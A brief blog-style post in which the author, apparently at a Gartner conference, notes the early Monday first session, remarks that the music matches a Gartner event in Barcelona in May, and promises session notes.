The first session is early on Monday morning. The music is the same as at the last Gartner event I attended, in May in Barcelona... Look forward to my session notes.